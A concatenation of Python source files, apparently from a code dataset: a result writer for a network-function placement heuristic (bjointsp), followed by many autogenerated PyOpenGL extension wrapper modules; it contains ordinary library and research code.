print("No matching VNFs in prev_embedding for edge from {} to {}. Ignoring the edge.".format(source, dest))
continue # skip and continue with next edge
# get arc from templates by matching against source and dest components
for t in templates:
if source.component in t.components and dest.component in t.components:
# assume t has an arc source->dest if both components are in t
arc = list(filter(lambda x: x.source == source.component and x.dest == dest.component, t.arcs))[0]
# add new edge to overlay of corresponding template
prev_embedding[t].edges.append(Edge(arc, source, dest))
return prev_embedding
```
#### File: bjointsp/read_write/writer.py
```python
import os
import yaml
from collections import defaultdict
from datetime import datetime
import bjointsp.objective as objective
from bjointsp.heuristic import shortest_paths as sp
import bjointsp.read_write.store as store
import networkx as nx
import uuid
import json
# prepare result-file based on scenario-file: in results-subdirectory, using scenario name + timestamp (+ seed + event)
# heuristic results also add the seed and event number; MIP results can add repetition instead
def create_result_file(input_files, subfolder, seed=None, seed_subfolder=False, obj=None):
file_name = ''
# add basename of each input file to the output filename
for f in input_files:
if f is not None:
file_name += os.path.basename(f).split('.')[0] + '-'
# put result in seed-subfolder
if seed is not None and seed_subfolder:
result_directory = os.path.join('results/' + subfolder + '/{}'.format(seed))
else:
result_directory = os.path.join('results/' + subfolder)
# add seed to result name
if seed is None:
seed = ''
else:
seed = '_{}'.format(seed)
timestamp = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
result_file = file_name + timestamp + seed + '.yaml'
result_path = os.path.join(result_directory, result_file)
os.makedirs(os.path.dirname(result_path), exist_ok=True) # create subdirectories if necessary
return result_path
#calculates end to end delay for every flow
def save_end2end_delay(edges, links):
flow_delays = {}
for edge in edges:
for flow in edge.flows:
if flow.id not in flow_delays:
flow_delays[flow.id] = 0
# adding vnf_delays of destinations
flow_delays[flow.id] += edge.dest.component.vnf_delay
# adding path delay ,path delays are always the shortest paths and hence the same, so just adding the one at 0th index.
flow_delays[flow.id] += sp.path_delay(links, edge.paths[0])
return flow_delays
def format_output(result, changed_instances, overlays, nodes, links):
instances, edges = set(), set()
for ol in overlays:
instances.update(ol.instances)
edges.update(ol.edges)
# save placement
result['placement'] = {'vnfs': [], 'vlinks': []}
result['metrics'] = {}
for i in instances:
vnf = {'name': i.component.name, 'node': i.location}
result['placement']['vnfs'].append(vnf)
result['metrics']['num_instances'] = len(result['placement']['vnfs'])
for e in edges:
vlink = {'src_vnf': e.source.component.name, 'src_node': e.source.location,
'dest_vnf': e.dest.component.name, 'dest_node': e.dest.location}
result['placement']['vlinks'].append(vlink)
# node capacity violations
result['placement']['cpu_oversub'] = []
result['placement']['mem_oversub'] = []
max_cpu, max_mem = 0, 0
for v in nodes.ids:
over_cpu = sum(i.consumed_cpu() for i in instances if i.location == v) - nodes.cpu[v]
if over_cpu > 0:
result['placement']['cpu_oversub'].append({'node': v})
if over_cpu > max_cpu:
max_cpu = over_cpu
over_mem = sum(i.consumed_mem() for i in instances if i.location == v) - nodes.mem[v]
if over_mem > 0:
result['placement']['mem_oversub'].append({'node': v})
if over_mem > max_mem:
max_mem = over_mem
result['metrics']['max_cpu_oversub'] = max_cpu
result['metrics']['max_mem_oversub'] = max_mem
# consumed node resources
result['placement']['alloc_node_res'] = []
for i in instances:
resources = {'name': i.component.name, 'node': i.location, 'cpu': i.consumed_cpu(), 'mem': i.consumed_mem()}
result['placement']['alloc_node_res'].append(resources)
# changed instances (compared to previous embedding)
result['metrics']['changed'] = []
for i in changed_instances:
result['metrics']['changed'].append({'name': i.component.name, 'node': i.location})
result['metrics']['num_changed'] = len(result['metrics']['changed'])
# edge and link data rate, used links
result['placement']['flows'] = []
result['metrics']['path_delays'] = []
result['metrics']['vnf_delays'] = []
result['metrics']['total_path_delay'] = 0
result['metrics']['total_vnf_delay'] = 0
result['metrics']['max_endToEnd_delay'] = 0
result['metrics']['total_delay'] = 0
result['placement']['links'] = []
consumed_dr = defaultdict(int) # default = 0
for e in edges:
for f in e.flows:
flow = {'arc': str(e.arc), 'src_node': e.source.location, 'dst_node': e.dest.location,
'src_vnf': e.source.component.name, 'dest_vnf': e.dest.component.name, 'flow_id': f.id}
result['placement']['flows'].append(flow)
for path in e.paths:
# record edge delay: all flows take the same (shortest) path => take path delay
path_delay = {'src': e.arc.source.name, 'dest': e.arc.dest.name, 'src_node': e.source.location, 'dest_node': e.dest.location, 'path_delay': sp.path_delay(links, path)}
result['metrics']['path_delays'].append(path_delay)
result['metrics']['total_path_delay'] += sp.path_delay(links, path)
result['metrics']['total_delay'] += sp.path_delay(links, path)
# go through nodes of each path and increase the dr of the traversed links
for i in range(len(path) - 1):
# skip connections on the same node (no link used)
if path[i] != path[i+1]:
consumed_dr[(path[i], path[i+1])] += e.flow_dr() / len(e.paths)
link = {'arc': str(e.arc), 'edge_src': e.source.location, 'edge_dst': e.dest.location, 'link_src': path[i], 'link_dst': path[i+1]}
result['placement']['links'].append(link)
# record VNF delay
for i in instances:
vnf_delay = {'vnf': i.component.name, 'vnf_delay': i.component.vnf_delay}
result['metrics']['vnf_delays'].append(vnf_delay)
result['metrics']['total_vnf_delay'] += i.component.vnf_delay
# record total delay = link + vnf delay
result['metrics']['total_delay'] = result['metrics']['total_path_delay'] + result['metrics']['total_vnf_delay']
#record max end-to-end delay
endToEnd = save_end2end_delay(edges,links)
if endToEnd:
result['metrics']['max_endToEnd_delay'] = max(endToEnd.values())
# for an empty placement, there is no end to end delay
else:
result['metrics']['max_endToEnd_delay'] = 0
# link capacity violations
result['placement']['dr_oversub'] = []
max_dr = 0
for l in links.ids:
if links.dr[l] < consumed_dr[l]:
result['placement']['dr_oversub'].append({'link': l})
if consumed_dr[l] - links.dr[l] > max_dr:
max_dr = consumed_dr[l] - links.dr[l]
result['metrics']['max_dr_oversub'] = max_dr
result['id'] = str(uuid.uuid4())
store.store_placement_result(result)
return result['id']
# add variable values to the result dictionary
def save_heuristic_variables(result, changed_instances, instances, edges, nodes, links):
# save placement
result['placement'] = {'vnfs': [], 'vlinks': []}
for i in instances:
vnf = {'name': i.component.name, 'node': i.location, 'image': i.component.config}
result['placement']['vnfs'].append(vnf)
result['metrics']['num_instances'] = len(result['placement']['vnfs'])
for e in edges:
vlink = {'src_vnf': e.source.component.name, 'src_node': e.source.location,
'dest_vnf': e.dest.component.name, 'dest_node': e.dest.location}
result['placement']['vlinks'].append(vlink)
# node capacity violations
result['placement']['cpu_oversub'] = []
result['placement']['mem_oversub'] = []
max_cpu, max_mem = 0, 0
for v in nodes.ids:
over_cpu = sum(i.consumed_cpu() for i in instances if i.location == v) - nodes.cpu[v]
if over_cpu > 0:
result['placement']['cpu_oversub'].append({'node': v})
if over_cpu > max_cpu:
max_cpu = over_cpu
over_mem = sum(i.consumed_mem() for i in instances if i.location == v) - nodes.mem[v]
if over_mem > 0:
result['placement']['mem_oversub'].append({'node': v})
if over_mem > max_mem:
max_mem = over_mem
result['metrics']['max_cpu_oversub'] = max_cpu
result['metrics']['max_mem_oversub'] = max_mem
# consumed node resources
result['placement']['alloc_node_res'] = []
for i in instances:
resources = {'name': i.component.name, 'node': i.location, 'cpu': i.consumed_cpu(), 'mem': i.consumed_mem()}
result['placement']['alloc_node_res'].append(resources)
# changed instances (compared to previous embedding)
result['metrics']['changed'] = []
for i in changed_instances:
result['metrics']['changed'].append({'name': i.component.name, 'node': i.location})
result['metrics']['num_changed'] = len(result['metrics']['changed'])
# edge and link data rate, used links
result['placement']['flows'] = []
result['metrics']['path_delays'] = []
result['metrics']['vnf_delays'] = []
result['metrics']['total_path_delay'] = 0
result['metrics']['total_vnf_delay'] = 0
result['metrics']['max_endToEnd_delay'] = 0
result['metrics']['total_delay'] = 0
result['placement']['links'] = []
consumed_dr = defaultdict(int) # default = 0
for e in edges:
for f in e.flows:
flow = {'arc': str(e.arc), 'src_node': e.source.location, 'dst_node': e.dest.location,
'src_vnf': e.source.component.name, 'dest_vnf': e.dest.component.name, 'flow_id': f.id}
result['placement']['flows'].append(flow)
for path in e.paths:
# record edge delay: all flows take the same (shortest) path => take path delay
path_delay = {'src': e.arc.source.name, 'dest': e.arc.dest.name, 'src_node': e.source.location, 'dest_node': e.dest.location, 'path_delay': sp.path_delay(links, path)}
result['metrics']['path_delays'].append(path_delay)
result['metrics']['total_path_delay'] += sp.path_delay(links, path)
result['metrics']['total_delay'] += sp.path_delay(links, path)
# go through nodes of each path and increase the dr of the traversed links
for i in range(len(path) - 1):
# skip connections on the same node (no link used)
if path[i] != path[i+1]:
consumed_dr[(path[i], path[i+1])] += e.flow_dr() / len(e.paths)
link = {'arc': str(e.arc), 'edge_src': e.source.location, 'edge_dst': e.dest.location, 'link_src': path[i], 'link_dst': path[i+1]}
result['placement']['links'].append(link)
# record VNF delay
for i in instances:
vnf_delay = {'vnf': i.component.name, 'vnf_delay': i.component.vnf_delay}
result['metrics']['vnf_delays'].append(vnf_delay)
result['metrics']['total_vnf_delay'] += i.component.vnf_delay
# record total delay = link + vnf delay
result['metrics']['total_delay'] = result['metrics']['total_path_delay'] + result['metrics']['total_vnf_delay']
#record max end-to-end delay
endToEnd = save_end2end_delay(edges,links)
if endToEnd:
result['metrics']['max_endToEnd_delay'] = max(endToEnd.values())
# for an empty placement, there is no end to end delay
else:
result['metrics']['max_endToEnd_delay'] = 0
# link capacity violations
result['placement']['dr_oversub'] = []
max_dr = 0
for l in links.ids:
if links.dr[l] < consumed_dr[l]:
result['placement']['dr_oversub'].append({'link': l})
if consumed_dr[l] - links.dr[l] > max_dr:
max_dr = consumed_dr[l] - links.dr[l]
result['metrics']['max_dr_oversub'] = max_dr
return result
def write_heuristic_result(runtime, obj_value, changed, overlays, input_files, obj, nodes, links, seed, seed_subfolder):
result_file = create_result_file(input_files, 'bjointsp', seed=seed, seed_subfolder=seed_subfolder, obj=obj)
instances, edges = set(), set()
for ol in overlays:
instances.update(ol.instances)
edges.update(ol.edges)
# construct result as dictionary for writing into YAML result file
# result = {'time': datetime.now().strftime('%Y-%m-%d_%H-%M-%S'),
# 'input': {'network': os.path.basename(input_files[0]),
# 'service': os.path.basename(input_files[1]),
# 'sources': os.path.basename(input_files[2]),
# 'fixed': 'None',
# 'prev_embedding': 'None',
# 'seed': seed,
# 'algorithm': 'bjointsp',
# 'objective': obj},
# 'metrics': {'runtime': runtime,
# 'obj_value': obj_value}}
result = {'time': datetime.now().strftime('%Y-%m-%d_%H-%M-%S'),
'input': {'network': os.path.basename(input_files[0]),
'service': os.path.basename(input_files[1]),
'sources': '',
'fixed': 'None',
'prev_embedding': 'None',
'seed': seed,
'algorithm': 'bjointsp',
'objective': obj},
'metrics': {'runtime': runtime,
'obj_value': obj_value}}
# set file of fixed instances and of previous embedding if they are specified
if input_files[3] is not None:
result['input']['fixed'] = os.path.basename(input_files[3])
if input_files[4] is not None:
result['input']['prev_embedding'] = os.path.basename(input_files[4])
# add input details to simplify evaluation: network size, etc
network = nx.read_graphml(input_files[0])
result['input']['num_nodes'] = network.number_of_nodes()
result['input']['num_edges'] = network.number_of_edges()
with open(input_files[1]) as f:
# service = yaml.load(f, yaml.SafeLoader)
service = json.load(f)
result['input']['num_vnfs'] = len(service['vnfs'])
# with open(input_files[2]) as f:
# sources = yaml.load(f, yaml.SafeLoader)
sources = None
if sources is None:
sources = []
result['input']['num_sources'] = len(sources)
result = save_heuristic_variables(result, changed, instances, edges, nodes, links)
with open(result_file, 'w', newline='') as outfile:
yaml.dump(result, outfile, default_flow_style=False)
print('Writing solution to {}'.format(result_file))
return result_file
``` |
{
"source": "5gconnectedbike/Navio2",
"score": 2
} |
#### File: GL/AMD/gpu_shader_int64.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.AMD.gpu_shader_int64 import *
from OpenGL.raw.GL.AMD.gpu_shader_int64 import _EXTENSION_NAME
def glInitGpuShaderInt64AMD():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glUniform1i64vNV.value size not checked against count
glUniform1i64vNV=wrapper.wrapper(glUniform1i64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform2i64vNV.value size not checked against count*2
glUniform2i64vNV=wrapper.wrapper(glUniform2i64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform3i64vNV.value size not checked against count*3
glUniform3i64vNV=wrapper.wrapper(glUniform3i64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform4i64vNV.value size not checked against count*4
glUniform4i64vNV=wrapper.wrapper(glUniform4i64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform1ui64vNV.value size not checked against count
glUniform1ui64vNV=wrapper.wrapper(glUniform1ui64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform2ui64vNV.value size not checked against count*2
glUniform2ui64vNV=wrapper.wrapper(glUniform2ui64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform3ui64vNV.value size not checked against count*3
glUniform3ui64vNV=wrapper.wrapper(glUniform3ui64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform4ui64vNV.value size not checked against count*4
glUniform4ui64vNV=wrapper.wrapper(glUniform4ui64vNV).setInputArraySize(
'value', None
)
# OUTPUT glGetUniformi64vNV.params COMPSIZE(program, location)
# OUTPUT glGetUniformui64vNV.params COMPSIZE(program, location)
# INPUT glProgramUniform1i64vNV.value size not checked against count
glProgramUniform1i64vNV=wrapper.wrapper(glProgramUniform1i64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform2i64vNV.value size not checked against count*2
glProgramUniform2i64vNV=wrapper.wrapper(glProgramUniform2i64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform3i64vNV.value size not checked against count*3
glProgramUniform3i64vNV=wrapper.wrapper(glProgramUniform3i64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform4i64vNV.value size not checked against count*4
glProgramUniform4i64vNV=wrapper.wrapper(glProgramUniform4i64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform1ui64vNV.value size not checked against count
glProgramUniform1ui64vNV=wrapper.wrapper(glProgramUniform1ui64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform2ui64vNV.value size not checked against count*2
glProgramUniform2ui64vNV=wrapper.wrapper(glProgramUniform2ui64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform3ui64vNV.value size not checked against count*3
glProgramUniform3ui64vNV=wrapper.wrapper(glProgramUniform3ui64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform4ui64vNV.value size not checked against count*4
glProgramUniform4ui64vNV=wrapper.wrapper(glProgramUniform4ui64vNV).setInputArraySize(
'value', None
)
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/derivative_control.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.derivative_control import *
from OpenGL.raw.GL.ARB.derivative_control import _EXTENSION_NAME
def glInitDerivativeControlARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/ES2_compatibility.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.ES2_compatibility import *
from OpenGL.raw.GL.ARB.ES2_compatibility import _EXTENSION_NAME
def glInitEs2CompatibilityARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glShaderBinary.binary size not checked against length
# INPUT glShaderBinary.shaders size not checked against count
glShaderBinary=wrapper.wrapper(glShaderBinary).setInputArraySize(
'binary', None
).setInputArraySize(
'shaders', None
)
glGetShaderPrecisionFormat=wrapper.wrapper(glGetShaderPrecisionFormat).setOutput(
'precision',size=(1,),orPassIn=True
).setOutput(
'range',size=(2,),orPassIn=True
)
### END AUTOGENERATED SECTION
from OpenGL import lazywrapper as _lazywrapper
from OpenGL.arrays import GLintArray
@_lazywrapper.lazy( glGetShaderPrecisionFormat )
def glGetShaderPrecisionFormat(baseOperation, shadertype, precisiontype, range=None,precision=None ):
"""Provides range and precision if not provided, returns (range,precision)"""
if range is None:
range = GLintArray.zeros( (2,))
if precision is None:
precision = GLintArray.zeros((2,))
baseOperation( shadertype, precisiontype, range, precision )
return range, precision
```
#### File: GL/ARB/framebuffer_object.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.framebuffer_object import *
from OpenGL.raw.GL.ARB.framebuffer_object import _EXTENSION_NAME
def glInitFramebufferObjectARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glDeleteRenderbuffers.renderbuffers size not checked against n
glDeleteRenderbuffers=wrapper.wrapper(glDeleteRenderbuffers).setInputArraySize(
'renderbuffers', None
)
glGenRenderbuffers=wrapper.wrapper(glGenRenderbuffers).setOutput(
'renderbuffers',size=lambda x:(x,),pnameArg='n',orPassIn=True
)
glGetRenderbufferParameteriv=wrapper.wrapper(glGetRenderbufferParameteriv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
# INPUT glDeleteFramebuffers.framebuffers size not checked against n
glDeleteFramebuffers=wrapper.wrapper(glDeleteFramebuffers).setInputArraySize(
'framebuffers', None
)
glGenFramebuffers=wrapper.wrapper(glGenFramebuffers).setOutput(
'framebuffers',size=lambda x:(x,),pnameArg='n',orPassIn=True
)
glGetFramebufferAttachmentParameteriv=wrapper.wrapper(glGetFramebufferAttachmentParameteriv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
### END AUTOGENERATED SECTION
from OpenGL.lazywrapper import lazy as _lazy
@_lazy( glDeleteFramebuffers )
def glDeleteFramebuffers( baseOperation, n, framebuffers=None ):
"""glDeleteFramebuffers( framebuffers ) -> None
"""
if framebuffers is None:
framebuffers = arrays.GLuintArray.asArray( n )
n = arrays.GLuintArray.arraySize( framebuffers )
return baseOperation( n, framebuffers )
# Setup the GL_UNSIGNED_INT_24_8 image type
from OpenGL import images
from OpenGL.raw.GL.VERSION.GL_1_1 import GL_UNSIGNED_INT
images.TYPE_TO_ARRAYTYPE[ GL_UNSIGNED_INT_24_8 ] = GL_UNSIGNED_INT
images.TIGHT_PACK_FORMATS[ GL_UNSIGNED_INT_24_8 ] = 4
# The extensions actually use the _EXT forms, which is a bit confusing
# for users, IMO.
GL_FRAMEBUFFER_INCOMPLETE_DIMENSIONS = constant.Constant( 'GL_FRAMEBUFFER_INCOMPLETE_DIMENSIONS', 0x8CD9 )
GL_FRAMEBUFFER_INCOMPLETE_FORMATS = constant.Constant( 'GL_FRAMEBUFFER_INCOMPLETE_FORMATS', 0x8CDA )
GL_FRAMEBUFFER_UNSUPPORTED = constant.Constant( 'GL_FRAMEBUFFER_UNSUPPORTED', 0x8CDD )
del images
del GL_UNSIGNED_INT
```
#### File: GL/ARB/pipeline_statistics_query.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.pipeline_statistics_query import *
from OpenGL.raw.GL.ARB.pipeline_statistics_query import _EXTENSION_NAME
def glInitPipelineStatisticsQueryARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/post_depth_coverage.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.post_depth_coverage import *
from OpenGL.raw.GL.ARB.post_depth_coverage import _EXTENSION_NAME
def glInitPostDepthCoverageARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/program_interface_query.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.program_interface_query import *
from OpenGL.raw.GL.ARB.program_interface_query import _EXTENSION_NAME
def glInitProgramInterfaceQueryARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
glGetProgramInterfaceiv=wrapper.wrapper(glGetProgramInterfaceiv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
# INPUT glGetProgramResourceIndex.name size not checked against 'name'
glGetProgramResourceIndex=wrapper.wrapper(glGetProgramResourceIndex).setInputArraySize(
'name', None
)
glGetProgramResourceName=wrapper.wrapper(glGetProgramResourceName).setOutput(
'length',size=(1,),orPassIn=True
).setOutput(
'name',size=lambda x:(x,),pnameArg='bufSize',orPassIn=True
)
# INPUT glGetProgramResourceiv.props size not checked against propCount
glGetProgramResourceiv=wrapper.wrapper(glGetProgramResourceiv).setOutput(
'length',size=(1,),orPassIn=True
).setOutput(
'params',size=lambda x:(x,),pnameArg='bufSize',orPassIn=True
).setInputArraySize(
'props', None
)
# INPUT glGetProgramResourceLocation.name size not checked against 'name'
glGetProgramResourceLocation=wrapper.wrapper(glGetProgramResourceLocation).setInputArraySize(
'name', None
)
# INPUT glGetProgramResourceLocationIndex.name size not checked against 'name'
glGetProgramResourceLocationIndex=wrapper.wrapper(glGetProgramResourceLocationIndex).setInputArraySize(
'name', None
)
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/shader_clock.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.shader_clock import *
from OpenGL.raw.GL.ARB.shader_clock import _EXTENSION_NAME
def glInitShaderClockARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/texture_rg.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.texture_rg import *
from OpenGL.raw.GL.ARB.texture_rg import _EXTENSION_NAME
def glInitTextureRgARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
from OpenGL import images as _images
_images.COMPONENT_COUNTS.update( {
GL_R16:1,
GL_R16F:1,
GL_R16I:1,
GL_R16UI:1,
GL_R32F:1,
GL_R32I:1,
GL_R32UI:1,
GL_R8:1,
GL_R8I:1,
GL_R8UI:1,
GL_RG:2,
GL_RG16:2,
GL_RG16F:2,
GL_RG16I:2,
GL_RG16UI:2,
GL_RG32F:2,
GL_RG32I:2,
GL_RG32UI:2,
GL_RG8:2,
GL_RG8I:2,
GL_RG8UI:2,
GL_RG_INTEGER:2,
})
```
#### File: GL/ARB/transform_feedback_overflow_query.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.transform_feedback_overflow_query import *
from OpenGL.raw.GL.ARB.transform_feedback_overflow_query import _EXTENSION_NAME
def glInitTransformFeedbackOverflowQueryARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES1/IMG/read_format.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES1 import _types, _glgets
from OpenGL.raw.GLES1.IMG.read_format import *
from OpenGL.raw.GLES1.IMG.read_format import _EXTENSION_NAME
def glInitReadFormatIMG():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES1/OES/fbo_render_mipmap.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES1 import _types, _glgets
from OpenGL.raw.GLES1.OES.fbo_render_mipmap import *
from OpenGL.raw.GLES1.OES.fbo_render_mipmap import _EXTENSION_NAME
def glInitFboRenderMipmapOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/ANGLE/program_binary.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.ANGLE.program_binary import *
from OpenGL.raw.GLES2.ANGLE.program_binary import _EXTENSION_NAME
def glInitProgramBinaryANGLE():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/ARM/mali_program_binary.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.ARM.mali_program_binary import *
from OpenGL.raw.GLES2.ARM.mali_program_binary import _EXTENSION_NAME
def glInitMaliProgramBinaryARM():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/ARM/shader_framebuffer_fetch.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.ARM.shader_framebuffer_fetch import *
from OpenGL.raw.GLES2.ARM.shader_framebuffer_fetch import _EXTENSION_NAME
def glInitShaderFramebufferFetchARM():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/debug_label.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.debug_label import *
from OpenGL.raw.GLES2.EXT.debug_label import _EXTENSION_NAME
def glInitDebugLabelEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glGetObjectLabelEXT.label size not checked against bufSize
glGetObjectLabelEXT=wrapper.wrapper(glGetObjectLabelEXT).setInputArraySize(
'label', None
).setInputArraySize(
'length', 1
)
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/draw_buffers.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.draw_buffers import *
from OpenGL.raw.GLES2.EXT.draw_buffers import _EXTENSION_NAME
def glInitDrawBuffersEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glDrawBuffersEXT.bufs size not checked against n
glDrawBuffersEXT=wrapper.wrapper(glDrawBuffersEXT).setInputArraySize(
'bufs', None
)
### END AUTOGENERATED SECTION
from OpenGL.lazywrapper import lazy as _lazy
@_lazy( glDrawBuffers )
def glDrawBuffers( baseOperation, n=None, bufs=None ):
"""glDrawBuffers( bufs ) -> bufs
Wrapper will calculate n from dims of bufs if only
one argument is provided...
"""
if bufs is None:
bufs = n
n = None
bufs = arrays.GLenumArray.asArray( bufs )
if n is None:
n = arrays.GLenumArray.arraySize( bufs )
return baseOperation( n,bufs )
```
#### File: GLES2/EXT/draw_instanced.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.draw_instanced import *
from OpenGL.raw.GLES2.EXT.draw_instanced import _EXTENSION_NAME
def glInitDrawInstancedEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glDrawElementsInstancedEXT.indices size not checked against 'count,type'
glDrawElementsInstancedEXT=wrapper.wrapper(glDrawElementsInstancedEXT).setInputArraySize(
'indices', None
)
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/multi_draw_arrays.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.multi_draw_arrays import *
from OpenGL.raw.GLES2.EXT.multi_draw_arrays import _EXTENSION_NAME
def glInitMultiDrawArraysEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glMultiDrawArraysEXT.count size not checked against 'primcount'
# INPUT glMultiDrawArraysEXT.first size not checked against 'primcount'
glMultiDrawArraysEXT=wrapper.wrapper(glMultiDrawArraysEXT).setInputArraySize(
'count', None
).setInputArraySize(
'first', None
)
# INPUT glMultiDrawElementsEXT.count size not checked against 'primcount'
# INPUT glMultiDrawElementsEXT.indices size not checked against 'primcount'
glMultiDrawElementsEXT=wrapper.wrapper(glMultiDrawElementsEXT).setInputArraySize(
'count', None
).setInputArraySize(
'indices', None
)
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/read_format_bgra.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.read_format_bgra import *
